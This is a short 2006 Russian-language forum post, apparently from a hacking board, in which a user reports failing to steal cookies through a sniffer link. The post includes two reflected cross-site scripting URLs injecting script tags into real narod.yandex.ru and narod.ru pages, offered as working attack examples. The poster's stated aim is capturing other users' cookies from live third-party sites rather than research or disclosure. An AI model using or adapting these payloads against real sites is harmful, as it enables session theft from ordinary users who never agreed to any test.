Показать сообщение отдельно

  #3  
Старый 21.03.2006, 22:32
red1rect
Новичок
Регистрация: 21.03.2006
Сообщений: 7
Провел на форуме:
46994

Репутация: 3
По умолчанию

К сожалению куки не идут, я такой запрос уже пробовал.

На саите даны 2 уязвимости, может вторая сработает, но как только я не подставлял ссылку на снифер, ниодного кука я не получил.

Пример №1:
http://narod.yandex.ru/rubrics/top100.xhtml?sort=xaxa><script>alert('Bug')</script><a%20a=&c=2xaxa
Пример №2:
http://www.narod.ru/guestbook/?owner=1&mainhtml=gb.txt&messageshtml=%3Cscript%3E alert('x')%3C/script%3E

Последний раз редактировалось red1rect; 21.03.2006 в 22:38..
 
Ответить с цитированием